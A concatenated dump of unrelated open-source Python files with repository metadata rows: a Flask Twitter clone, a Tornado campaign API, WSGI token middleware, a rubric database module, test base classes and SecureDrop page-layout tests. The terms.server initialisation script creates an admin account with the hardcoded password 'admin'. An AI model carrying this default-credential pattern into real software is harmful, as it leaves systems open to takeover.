return {node.syntax_kind: node for node in SYNTAX_NODES}
def is_visitable(node):
return not node.is_base() and not node.collection_element
def dedented_lines(description):
"""
Each line of the provided string with leading whitespace stripped.
"""
if not description:
return []
return textwrap.dedent(description).split('\n')
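# Minimal usage sketch (illustration only, not part of the original module).
# It assumes the Node objects in SYNTAX_NODES expose a `children` list, as the
# generator templates that consume this module do.
def _demo_print_missing_children(syntax_kind):
    node = create_node_map()[syntax_kind]
    for child in node.children:
        # make_missing_child() emits the C++ expression used for a placeholder child
        print(child.name, '->', make_missing_child(child))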
| apache-2.0 | -4,316,504,402,919,193,600 | 34.343137 | 75 | 0.618863 | false |
enriquepablo/terms.server | terms/server/scripts/initialize.py | 1 | 3315 |
import os
import sys
from multiprocessing.connection import Client
import bcrypt
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.exc import NoResultFound
from terms.server.scripts.webserver import get_config
from terms.server.schemata import Schema
from terms.server.pluggable import load_plugins, get_plugins
from terms.server.pluggable import ImportRegistry, Base
from terms.server.app.schemata import Person
def import_ontologies(config, session):
'''
get directory
cycle over trm files
if the file name not in importregistry
break file content on dots
send pieces to server
put filename in importregistry
'''
for module in get_plugins(config):
fname = os.path.join(os.path.dirname(module.__file__), 'ontology', 'terms.trm')
totell = []
kb = Client((config('kb_host'), int(config('kb_port'))))
with open(fname, 'r') as f:
for line in f.readlines():
if line:
kb.send_bytes(line)
kb.send_bytes('FINISH-TERMS')
for fact in iter(kb.recv_bytes, 'END'):
print(fact)
kb.close()
def import_exec_globals(config, session):
'''
get exec_globals directory
cycle over its files
if the file name not in importregistry
send its contents to server
put filename in importregistry
'''
for module in get_plugins(config):
dirname = os.path.join(os.path.dirname(module.__file__),
'exec_globals')
for fname in sorted(os.listdir(dirname)):
if fname.endswith('.py'):
name = 'execs:' + fname[:-3]
try:
session.query(ImportRegistry).filter(ImportRegistry.name==name).one()
except NoResultFound:
path = os.path.join(dirname, fname)
with open(path, 'r') as f:
eg = f.read()
kb = Client((config('kb_host'), int(config('kb_port'))))
kb.send_bytes('compiler:exec_globals:' + eg)
kb.send_bytes('FINISH-TERMS')
for fact in iter(kb.recv_bytes, 'END'):
print(fact)
kb.close()
ir = ImportRegistry(name)
session.add(ir)
def init_terms():
config = get_config()
address = '%s/%s' % (config('dbms'), config('dbname'))
load_plugins(config)
engine = create_engine(address)
Schema.metadata.create_all(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
import_ontologies(config, session)
import_exec_globals(config, session)
pass1 = 'admin'
# we need defaults for automated scripts here
# pass1, pass2 = '', ' '
# while pass1 != pass2:
# pass1 = raw_input('Enter a password for the admin user: ')
# pass2 = raw_input('Repeat it: ')
password = bcrypt.hashpw(pass1, bcrypt.gensalt())
admin = Person(_id='admin', name='admin', surname='superuser', password=password)
session.add(admin)
session.commit()
session.close()
sys.exit('Created knowledge store %s' % config('dbname'))
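# Minimal sketch of the wire protocol used above (illustration only): each payload
# is pushed with send_bytes, terminated with 'FINISH-TERMS', and the server streams
# responses until it sends 'END'.
#
#     kb = Client((config('kb_host'), int(config('kb_port'))))
#     kb.send_bytes('a-term.')
#     kb.send_bytes('FINISH-TERMS')
#     for fact in iter(kb.recv_bytes, 'END'):
#         print(fact)
#     kb.close()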
| gpl-3.0 | 6,884,474,950,106,547,000 | 34.645161 | 89 | 0.590649 | false |
pythonpro-dev/pp-apiaccesstoken | pp/apiaccesstoken/middleware.py | 1 | 3860 | # -*- coding: utf-8 -*-
"""
"""
import logging
from pp.apiaccesstoken.tokenmanager import Manager
from pp.apiaccesstoken.tokenmanager import AccessTokenInvalid
from pp.apiaccesstoken.headers import WSGI_ENV_ACCESS_TOKEN_HEADER
def get_log(e=None):
return logging.getLogger("{0}.{1}".format(__name__, e) if e else __name__)
def recover_secret(access_token):
"""Given the access_token recover the access_secret to verify it with.
    :param access_token: The access token string.
:returns: access_secret on success or None on failure.
"""
raise NotImplementedError('No Valid Access Detail Recovery Provided')
class ValidateAccessToken(object):
"""Validate and API access token and populate the wsgi environment with
the identity recovered.
ValidateAccessToken.HTTP_HEADER is the name of the wsgi env variable to
look for.
ValidateAccessToken.ENV_KEY is the name wsgi env variable to store
the identity in. The value of the identity is recovered from the 'identity'
field in the access_token payload.
The constructor for this class takes a recover_secret() function. This
needs to be provided or NotImplementedError will be raised. This function
recovers the access_secret for the given access_token if any. If this
function returns None then nothing was recovered and the token is invalid.
"""
# The wsgi environment variable to set when an identity was found:
ENV_KEY = 'pp.api_access.identity'
def __init__(
self, application, recover_secret=recover_secret
):
self.log = get_log('ValidateAccessToken')
self.application = application
self.recover_secret = recover_secret
def recover_access(self, environ, access_token):
"""Populate the environment with the user identity recovered from the
payload of the access_token.
To get the payload the access_token needs its corresponding
access_secret to recover it.
"""
log = get_log('ValidateAccessToken.recover_access')
log.debug("recovering the access_secret for access_token:{}".format(
access_token
))
try:
access_secret = self.recover_secret(access_token)
if access_secret:
log.debug(
"access_secret for access_token:{} recovered OK.".format(
access_token
)
)
man = Manager(access_secret)
payload = man.verify_access_token(access_token)
log.debug(
"Payload recovered for '{}'. Looking for identity.".format(
access_token
)
)
identity = payload['identity']
self.log.debug(
"Token Valid. Adding identity '{}' environ.".format(
identity
)
)
environ[self.ENV_KEY] = identity
else:
self.log.debug(
"No secret recovered for '{}'. Ignoring token.".format(
access_token
)
)
except AccessTokenInvalid, e:
self.log.error(
"token validation fail: '{}'".format(e)
)
except Exception, e:
self.log.exception(
"General error validating token: '{}'".format(e)
)
def __call__(self, environ, start_response):
"""Wsgi hook into kicking off the token validation and identity
recovery.
"""
access_token = environ.get(WSGI_ENV_ACCESS_TOKEN_HEADER)
if access_token:
self.recover_access(environ, access_token)
return self.application(environ, start_response)
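# Minimal usage sketch (illustration only, not part of the original module): wire the
# middleware around a WSGI app with a project-specific secret lookup. The lookup
# function and app below are placeholders, not part of this package.
def _example_recover_secret(access_token):
    # Assumption: secrets are kept in a simple in-memory map for the example.
    return {'example-token': 'example-secret'}.get(access_token)


def _example_app(environ, start_response):
    identity = environ.get(ValidateAccessToken.ENV_KEY, 'anonymous')
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [identity]


# wrapped = ValidateAccessToken(_example_app, recover_secret=_example_recover_secret)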
| bsd-3-clause | -3,918,434,066,661,931,500 | 31.711864 | 79 | 0.594301 | false |
boun-cmpe-soslab/drenaj | drenaj/drenaj_api/handlers/campaignshandler.py | 1 | 8934 | import bson.json_util
import tornado.ioloop
import tornado.web
from pymongo.errors import OperationFailure
from tornado import gen
from tornado.web import HTTPError
from tornado.web import MissingArgumentError
import drenaj_api.utils.drenajneo4jmanager as drenajneo4jmanager
class CampaignsHandler(tornado.web.RequestHandler):
## def datetime_hook(self, dct):
## # TODO: this only checks for the first level 'created_at'
## # We should think about whether making this recursive.
## if 'created_at' in dct:
## time_struct = time.strptime(dct['created_at'], "%a %b %d %H:%M:%S +0000 %Y") #Tue Apr 26 08:57:55 +0000 2011
## dct['created_at'] = datetime.datetime.fromtimestamp(time.mktime(time_struct))
## return bson.json_util.object_hook(dct)
## return bson.json_util.object_hook(dct)
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", "*")
self.set_header("Access-Control-Allow-Methods", "GET, POST, DELETE, PUT, OPTIONS")
self.set_header('Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept')
def options(self, *args):
self.post(*args)
def get(self, *args):
self.post(*args)
#self.write("not implemented yet")
#@drenaj_simple_auth
@tornado.web.asynchronous
@gen.coroutine
def post(self, *args, **keywords):
        # Refactoring note: the new drenaj database manager is now a class and it's initialized
        # in the Tornado application. The old code just imported the manager module as 'drenajmongomanager'.
        # Instead of a search&replace procedure, assign the new db instance to drenajmongomanager.
drenajmongomanager = self.application.db
print args
action = args[0]
print action
print args
verbose_response = self.get_argument('verbose', '')
if (action == 'new'):
try:
campaign_id = self.get_argument('campaign_id')
description = self.get_argument('description', '')
campaign_type = self.get_argument('campaign_type', '') # timeline, streaming or both.
query_terms = self.get_argument('query_terms', '')
user_id_strs_to_follow = self.get_argument('user_id_strs_to_follow', '')
user_screen_names_to_follow = self.get_argument('user_screen_names_to_follow', '')
try:
drenajmongomanager.create_campaign(
{
'campaign_id': campaign_id,
'description': description,
'campaign_type': campaign_type,
'query_terms': query_terms,
'user_id_strs_to_follow': user_id_strs_to_follow,
'user_screen_names_to_follow': user_screen_names_to_follow,
})
result = 'success'
except OperationFailure:
result = 'failure'
self.write({'status': result})
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
# TODO: implement logging.
                raise HTTPError(500, "You didn't supply %s as an argument" % e.arg_name)
elif (action == 'view'):
try:
campaign_id = self.get_argument('campaign_id', 'default')
subcommand = args[1]
if subcommand == None:
cursor = drenajmongomanager.get_campaign(campaign_id)
campaign = yield cursor
if campaign:
self.write(bson.json_util.dumps(campaign))
else:
self.write(bson.json_util.dumps({}))
self.add_header('Content-Type', 'application/json')
if subcommand == "watched_users":
skip = self.get_argument('skip', 0)
limit = self.get_argument('limit', 100)
attached_users_array = drenajneo4jmanager.get_users_attached_to_campaign(campaign_id, skip, limit)
attached_users_response = {'watched_users': [], 'campaign_id': campaign_id}
for item in attached_users_array:
x = dict()
y = dict()
for rel in item[1]:
if rel.type == 'TIMELINE_TASK_STATE':
x = dict(rel.properties)
elif rel.type == 'FRIENDFOLLOWER_TASK_STATE':
y = dict(rel.properties)
attached_users_response['watched_users'] += [[item[0], x, y]]
self.write(bson.json_util.dumps(attached_users_response))
self.add_header('Content-Type', 'application/json')
elif subcommand == "freqs":
cursor = drenajmongomanager.get_campaign_with_freqs(campaign_id)
cursor = yield cursor
campaign = cursor['result']
if campaign:
self.write(bson.json_util.dumps(campaign))
else:
self.write(bson.json_util.dumps({}))
self.add_header('Content-Type', 'application/json')
elif subcommand == 'histograms':
re_calculate = self.get_argument('re_calculate', 'no')
n_bins = self.get_argument('n_bins', "100")
if re_calculate == 'no':
cursor = drenajmongomanager.get_campaign_histograms(campaign_id)
hists = yield cursor
if hists.count() == 0:
re_calculate = 'yes'
if re_calculate == 'yes':
results = drenajmongomanager.get_users_related_with_campaign(campaign_id)
tmp = yield results[0]
users = tmp['result']
# How many tweets?
tmp = yield results[1]
n_tweets = tmp.count()
hist = drenajmongomanager.prepare_hist_and_plot(n_tweets, users, n_bins, campaign_id)
hists = [hist]
yield self.application.db.motor_column.histograms.insert(hist)
self.write(bson.json_util.dumps(hists[0]))
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
# TODO: implement logging.
                raise HTTPError(500, "You didn't supply %s as an argument" % e.arg_name)
elif (action == 'edit'):
try:
campaign_id = self.get_argument('campaign_id')
subcommand = args[1]
if subcommand == 'add_watched_users':
new_watched_users = self.get_argument('new_watched_users','')
drenajmongomanager.add_to_watchlist(campaign_id, new_watched_users)
self.write(bson.json_util.dumps({'result': 'successful'}))
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
                raise HTTPError(500, "You didn't supply %s as an argument" % e.arg_name)
elif (action == 'list'):
try:
cursor = drenajmongomanager.get_campaigns_list()
campaigns = yield cursor.to_list(length=None)
self.write(bson.json_util.dumps(campaigns))
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
# TODO: implement logging.
                raise HTTPError(500, "You didn't supply %s as an argument" % e.arg_name)
elif (action == 'filter'):
try:
skip = int(self.get_argument('skip', 0))
limit = int(self.get_argument('limit', 10))
print("FILTER: ", "skip: ", skip, ", limit", limit)
cursor = drenajmongomanager.get_campaign_list_with_freqs(skip, limit)
print("END FILTER: ", "skip: ", skip, ", limit", limit)
cursor = yield cursor
campaigns = cursor['result']
print("GCLWF: EXCEPTION: ", "campaigns: ", campaigns)
self.write(bson.json_util.dumps(campaigns))
self.add_header('Content-Type', 'application/json')
except MissingArgumentError as e:
# TODO: implement logging.
                raise HTTPError(500, "You didn't supply %s as an argument" % e.arg_name)
else:
self.write('not recognized')
| mit | -2,630,529,231,603,231,000 | 46.269841 | 123 | 0.527871 | false |
scott-s-douglas/SWAPR | SWAPRrubric.py | 1 | 10154 | from SWAPRsqlite import *
from itertools import groupby
def createRubricsTable(db):
db.cursor.execute("CREATE TABLE IF NOT EXISTS rubrics (labNumber int, itemIndex int, itemType text, itemValues text, graded boolean, itemPrompt text)")
def addRubricItem(db, labNumber, itemIndex, itemType, itemValues, graded, itemPrompt = None):
db.cursor.execute("INSERT INTO rubrics VALUES (NULL, ?, ?, ?, ?, ?)", [labNumber, itemIndex, itemType, itemPrompt, graded])
if itemValues == []:
db.cursor.execute("INSERT INTO responseKeys VALUES (NULL,?,?,?,?)",[labNumber,itemIndex,0,None])
for i in range(len(itemValues)):
db.cursor.execute("INSERT INTO responseKeys VALUES (NULL, ?,?,?,?)",[labNumber, itemIndex,i,float(itemValues[-(i+1)])])
db.conn.commit()
def getMaxScore(db,labNumber):
# assumes max score corresponds with response 0
db.cursor.execute("SELECT score FROM responseKeys, rubrics WHERE response = 0 AND responseKeys.labNumber = ? AND responseKeys.itemIndex = rubrics.itemIndex AND responseKeys.labNumber = rubrics.labNumber AND graded",[labNumber])
maxScoreVector = [float(entry[0]) for entry in db.cursor.fetchall()]
maxScore = sum(maxScoreVector)
return maxScore, maxScoreVector
def getNgradedItems(db,labNumber,likert5only=False):
"Return the number of graded items in a particular lab's rubric. This function makes a SQLite call, so don't run it between a select and a fetch on that same database."
if not likert5only:
db.cursor.execute('''SELECT count(*)
FROM rubrics
WHERE
labNumber = ?
AND graded
''',[labNumber])
else:
db.cursor.execute('''SELECT count(*)
FROM rubrics
WHERE
labNumber = ?
AND graded
AND itemType = 'likert5'
''',[labNumber])
Ngraded = int(db.cursor.fetchone()[0])
return Ngraded
def getScoresDict(db,labNumber):
# Construct a dictionary of dictionaries where each possible response is paired with its score for GRADED items only
db.cursor.execute('''SELECT k.itemIndex, k.response, k.score
FROM responseKeys k, rubrics r
WHERE
--match labNumber
r.labNumber = ?
AND r.labNumber = k.labNumber
--match itemIndex
AND r.itemIndex = k.itemIndex
AND k.score IS NOT NULL
AND r.graded
ORDER BY k.itemIndex, k.response, k.score''',[labNumber])
data = [[int(entry[0]),int(entry[1]),float(entry[2])] for entry in db.cursor.fetchall()]
scoresDict = {}
for itemIndex, itemIndexGroup in groupby(data, lambda entry: entry[0]):
thisScores = {}
for pair in itemIndexGroup:
thisScores.update({pair[1]:pair[2]})
scoresDict.update({itemIndex:thisScores})
return scoresDict
def addDefaultRubric(db, labNumber):
# Make sure the Wnumbers are actually consecutive on WebAssign!
if labNumber == 3:
addRubricItem(db, labNumber, 1, 'likert5', [0,2,6,10,12], True, 'The video presentation is clean and easy to follow.')
addRubricItem(db, labNumber, 2, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the video presentation?')
addRubricItem(db, labNumber, 3, 'yhn', [0,6,12], True, 'Does the video introduce the problem and state the main result?')
addRubricItem(db, labNumber, 4, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the introduction and the statements of the main result?')
addRubricItem(db, labNumber, 5, 'yhn', [0,6,12], True, 'Does the video identify the model(s) relevant to this physical system?')
addRubricItem(db, labNumber, 6, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the discussion of how the main physics ideas are applied in the problem under study?')
addRubricItem(db, labNumber, 7, 'yhn', [0,1,2], True, 'The computational model(s) successfully predict(s) the mass of the black hole.')
addRubricItem(db, labNumber, 8, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve how well his/her computational model(s) predicted the mass of the black hole?')
addRubricItem(db, labNumber, 9, 'likert5', [0,2,6,10,12], True, 'The presenter successfully discusses how his/her computational model(s) predicts or fails to predict the mass of the black hole.')
addRubricItem(db, labNumber, 10, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her EXPLANATION of how his/her model predicted the mass of the black hole?')
addRubricItem(db, labNumber, 11, 'likert5', [0,2,6,10,12], True, 'The video presentation correctly explains the physics.')
addRubricItem(db, labNumber, 12, 'freeResponse', [], False, 'Were there any aspects of the physics in this video which the presenter did not make clear? Was the presenter mistaken about some of the physics he or she presented?')
addRubricItem(db, labNumber, 13, 'comparative5', [-2,-1,0,1,2], False, 'How does this video compare to your own video?')
addRubricItem(db, labNumber, 14, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her report, or what are a couple of things you have learned from this video to improve your own report?')
    elif labNumber == 6:
addRubricItem(db, labNumber, 1, 'likert5', [0,2,6,10,12], True, 'The video presentation is clear and easy to follow.')
addRubricItem(db, labNumber, 2, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the video presentation?')
addRubricItem(db, labNumber, 3, 'yhn', [0,6,12], True, 'Does the presenter identify the lecture they attended and introduce the topic of that lecture?')
addRubricItem(db, labNumber, 4, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the introduction and the problem statement? ')
addRubricItem(db, labNumber, 5, 'yhn', [0,1,2], True, 'Does the presenter summarize the main points of the lecture and state why this topic was of interest to him or her?')
addRubricItem(db, labNumber, 6, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the summary of the main points of the lecture? ')
        addRubricItem(db, labNumber, 7, 'likert5', [0,2,6,10,12], True, 'The presenter taught the viewer something interesting they learned as a result of attending this lecture.')
addRubricItem(db, labNumber, 8, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the summary of the main points of the lecture? ')
addRubricItem(db, labNumber, 9, 'likert5', [0,2,6,10,12], True, 'The presenter followed up on the lecture with ideas or concepts not discussed by the public speaker.')
addRubricItem(db, labNumber, 10, 'freeResponse', [], False, 'Were there any aspects of the physics in this video which the presenter did not make clear? Was the presenter mistaken about some of the physics he or she presented? ')
addRubricItem(db, labNumber, 11, 'comparative5', [-2,-1,0,1,2], False, 'How does this video compare to your own video?')
addRubricItem(db, labNumber, 12, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her report, or what are a couple of things you have learned from this video to improve your own report?')
else:
addRubricItem(db, labNumber, 1, 'likert5', [0,2,6,10,12], True, 'The video presentation is clean and easy to follow.')
addRubricItem(db, labNumber, 2, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the video presentation?')
addRubricItem(db, labNumber, 3, 'yhn', [0,6,12], True, 'Does the video introduce the problem and state the main result?')
addRubricItem(db, labNumber, 4, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the introduction and the statements of the main result?')
addRubricItem(db, labNumber, 5, 'yhn', [0,6,12], True, 'Does the video identify the model(s) relevant to this physical system?')
addRubricItem(db, labNumber, 6, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve the discussion of how the main physics ideas are applied in the problem under study?')
addRubricItem(db, labNumber, 7, 'likert5', [0,0.5,1,1.5,2], True, 'The computational model(s) successfully predict(s) the motion of the object observed.')
addRubricItem(db, labNumber, 8, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve how well his/her computational model(s) predicted the motion of the object?')
addRubricItem(db, labNumber, 9, 'likert5', [0,2,6,10,12], True, 'The presenter successfully discusses how his/her computational model(s) predicts or fails to predict the motion of the object.')
addRubricItem(db, labNumber, 10, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her EXPLANATION of how his/her model predicted the motion of the object?')
addRubricItem(db, labNumber, 11, 'likert5', [0,2,6,10,12], True, 'The video presentation correctly explains the physics.')
addRubricItem(db, labNumber, 12, 'freeResponse', [], False, 'Were there any aspects of the physics in this video which the presenter did not make clear? Was the presenter mistaken about some of the physics he or she presented?')
addRubricItem(db, labNumber, 13, 'comparative5', [-2,-1,0,1,2], False, 'How does this video compare to your own video?')
addRubricItem(db, labNumber, 14, 'freeResponse', [], False, 'What are a couple of things this presenter could do to improve his/her report, or what are a couple of things you have learned from this video to improve your own report?')
| gpl-2.0 | -4,788,761,156,601,311,000 | 85.786325 | 241 | 0.697065 | false |
griddynamics/nova-billing | tests/__init__.py | 1 | 1989 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Nova Billing
# Copyright (C) GridDynamics Openstack Core Team, GridDynamics
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Base class for Nova Billing unit tests.
"""
import unittest
import stubout
import json
import os
class TestCase(unittest.TestCase):
def setUp(self):
"""Run before each test method to initialize test environment."""
super(TestCase, self).setUp()
self.stubs = stubout.StubOutForTesting()
def tearDown(self):
"""Runs after each test method to tear down test environment."""
self.stubs.UnsetAll()
self.stubs.SmartUnsetAll()
@staticmethod
def json_load_from_file(filename):
with open(os.path.join(os.path.dirname(
os.path.abspath(__file__)), filename),
"rt") as json_file:
return json.load(json_file)
#Set it to True for json out files regeneration
write_json = False
def json_check_with_file(self, data, filename):
if self.write_json:
with open(os.path.join(os.path.dirname(
os.path.abspath(__file__)), filename),
"wt") as json_file:
json.dump(data, json_file, indent=4)
else:
self.assertEqual(data,
self.json_load_from_file(filename))
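# Example usage sketch (illustration only, not part of the original test suite):
#
#     class BillingReportTestCase(TestCase):
#         def test_report(self):
#             # "expected_report.json" is an assumed fixture name next to this module
#             data = {"instances": []}
#             self.json_check_with_file(data, "expected_report.json")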
| gpl-3.0 | 3,098,607,152,673,971,000 | 32.728814 | 74 | 0.646053 | false |
science09/minitwi | app/minitwi.py | 1 | 6408 | #-*- coding:utf-8 -*-
import time
from hashlib import md5
from datetime import datetime
from flask import Flask, request, session, url_for, redirect, \
render_template, abort, g, flash
from werkzeug.security import check_password_hash, generate_password_hash
from models import *
PER_PAGE = 10
app = Flask(__name__)
app.config['SECRET_KEY'] = 'development key'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///tuimimi.db'
app.debug = True
app.config.from_object(__name__)
app.config.from_envvar('MINITWIT_SETTINGS', silent=True)
def get_user_id(username):
"""Convenience method to look up the id for a username."""
    rv = User.query.filter_by(username=username).first()
return rv.user_id if rv else None
def format_datetime(timestamp):
"""Format a timestamp for display."""
return datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d @ %H:%M')
def gravatar_url(email, size=80):
"""Return the gravatar image for the given email address."""
return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \
(md5(email.strip().lower().encode('utf-8')).hexdigest(), size)
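# e.g. gravatar_url('[email protected]', 48)
# -> 'http://www.gravatar.com/avatar/<md5 of the email>?d=identicon&s=48'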
@app.before_request
def before_request():
g.user = None
if 'user_id' in session:
g.user = User.query.filter_by(user_id=session['user_id']).first_or_404()
else:
app.logger.warning('user_id not in session')
@app.route('/')
def timeline():
"""Shows a users timeline or if no user is logged in it will
redirect to the public timeline. This timeline shows the user's
messages as well as all the messages of followed users.
"""
if not g.user:
return redirect(url_for('public_timeline'))
message = Message.query.filter_by(author_id=session['user_id']).order_by('pub_date desc').limit(PER_PAGE)
return render_template('timeline.html', messages=message)
@app.route('/public')
def public_timeline():
"""Displays the latest messages of all users."""
message = Message.query.order_by('pub_date desc').limit(PER_PAGE)
return render_template('timeline.html', messages=message)
@app.route('/<username>')
def user_timeline(username):
"""Display's a users tweets."""
profile_user = User.query.filter_by(username=username).first_or_404()
print profile_user
if profile_user is None:
abort(404)
followed = False
if g.user:
followed = Follower.query.filter_by(who_id=session['user_id'],whom_id=profile_user.user_id).first() is not None
message = Message.query.filter_by(author_id=profile_user.user_id).order_by('pub_date desc').limit(PER_PAGE)
return render_template('timeline.html', messages=message,profile_user=profile_user,followed=followed)
@app.route('/<username>/follow')
def follow_user(username):
"""Adds the current user as follower of the given user."""
if not g.user:
abort(401)
whom_id = get_user_id(username)
if whom_id is None:
abort(404)
follower = Follower(session['user_id'], whom_id)
db.session.add(follower)
db.session.commit()
flash('You are now following "%s"' % username)
return redirect(url_for('user_timeline', username=username))
@app.route('/<username>/unfollow')
def unfollow_user(username):
"""Removes the current user as follower of the given user."""
if not g.user:
abort(401)
whom_id = get_user_id(username)
if whom_id is None:
abort(404)
follower = Follower.query.filter_by(who_id=session['user_id'], whom_id=whom_id).first()
db.session.delete(follower)
db.session.commit()
flash('You are no longer following "%s"' % username)
return redirect(url_for('user_timeline', username=username))
@app.route('/add_message', methods=['POST'])
def add_message():
"""Registers a new message for the user."""
if 'user_id' not in session:
abort(401)
if request.form['text']:
message = Message(session['user_id'], request.form['text'], int(time.time()))
db.session.add(message)
db.session.commit()
flash('Your message was recorded')
return redirect(url_for('timeline'))
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Logs the user in."""
if g.user:
return redirect(url_for('timeline'))
error = None
if request.method == 'POST':
        user = User.query.filter_by(username=request.form['username']).first()
if user is None:
error = 'Invalid username'
elif not check_password_hash( user.pw_hash, request.form['password']):
error = 'Invalid password'
else:
flash('You were logged in')
session['user_id'] = user.user_id
return redirect(url_for('timeline'))
return render_template('login.html', error=error)
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Registers the user."""
if g.user:
return redirect(url_for('timeline'))
error = None
if request.method == 'POST':
if not request.form['username']:
error = 'You have to enter a username'
elif not request.form['email'] or \
'@' not in request.form['email']:
error = 'You have to enter a valid email address'
elif not request.form['password']:
error = 'You have to enter a password'
elif request.form['password'] != request.form['password2']:
error = 'The two passwords do not match'
elif User.query.filter_by(username=request.form['username']).first() is not None:
error = 'The username is already taken'
else:
user = User(request.form['username'], request.form['email'],
generate_password_hash(request.form['password']))
print request.form['username'], request.form['email']
db.session.add(user)
db.session.commit()
flash('You were successfully registered and can login now')
return redirect(url_for('login'))
return render_template('register.html', error=error)
@app.route('/logout')
def logout():
"""Logs the user out."""
flash('You were logged out')
session.pop('user_id', None)
return redirect(url_for('public_timeline'))
# add some filters to jinja
app.jinja_env.filters['datetimeformat'] = format_datetime
app.jinja_env.filters['gravatar'] = gravatar_url
if __name__ == '__main__':
db.create_all()
app.run()
| mit | 8,190,148,019,333,539,000 | 36.255814 | 119 | 0.644351 | false |
garrettr/securedrop | securedrop/tests/pages-layout/test_source.py | 1 | 6151 | #
# SecureDrop whistleblower submission system
# Copyright (C) 2017 Loic Dachary <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from tests.functional import journalist_navigation_steps
from tests.functional import source_navigation_steps
import functional_test
import pytest
@pytest.mark.pagelayout
class TestSourceLayout(
functional_test.FunctionalTest,
source_navigation_steps.SourceNavigationStepsMixin,
journalist_navigation_steps.JournalistNavigationStepsMixin):
def test_index(self):
self._source_visits_source_homepage()
self._screenshot('source-index.png')
def test_index_javascript(self):
self._javascript_toggle()
self._source_visits_source_homepage()
self._screenshot('source-index_javascript.png')
def test_lookup(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._screenshot('source-lookup.png')
def test_lookup_shows_codename(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_shows_codename()
self._screenshot('source-lookup-shows-codename.png')
def test_login(self):
self._source_visits_source_homepage()
self._source_chooses_to_login()
self._screenshot('source-login.png')
def test_enters_text_in_login_form(self):
self._source_visits_source_homepage()
self._source_chooses_to_login()
self._source_enters_codename_in_login_form()
self._screenshot('source-enter-codename-in-login.png')
def test_use_tor_browser(self):
self._source_visits_use_tor()
self._screenshot('source-use_tor_browser.png')
def test_generate(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._screenshot('source-generate.png')
def test_logout_flashed_message(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._source_logs_out()
self._screenshot('source-logout_flashed_message.png')
def test_submission_entered_text(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_enters_text_in_message_field()
self._screenshot('source-submission_entered_text.png')
def test_next_submission_flashed_message(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._source_submits_a_message()
self._screenshot('source-next_submission_flashed_message.png')
def test_source_checks_for_reply(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._source_logs_out()
self._journalist_logs_in()
self._journalist_checks_messages()
self._journalist_downloads_message()
self._journalist_sends_reply_to_source()
self._source_visits_source_homepage()
self._source_chooses_to_login()
self._source_proceeds_to_login()
self._screenshot('source-checks_for_reply.png')
self._source_deletes_a_journalist_reply()
self._screenshot('source-deletes_reply.png')
def test_source_flagged(self):
self._source_visits_source_homepage()
self._source_chooses_to_submit_documents()
self._source_continues_to_submit_page()
self._source_submits_a_file()
self._source_logs_out()
self._journalist_logs_in()
self._source_delete_key()
self._journalist_visits_col()
self._journalist_flags_source()
self._source_visits_source_homepage()
self._source_chooses_to_login()
self._source_proceeds_to_login()
self._screenshot('source-flagged.png')
def test_notfound(self):
self._source_not_found()
self._screenshot('source-notfound.png')
def test_tor2web_warning(self):
self._source_tor2web_warning()
self._screenshot('source-tor2web_warning.png')
def test_why_journalist_key(self):
self._source_why_journalist_key()
self._screenshot('source-why_journalist_key.png')
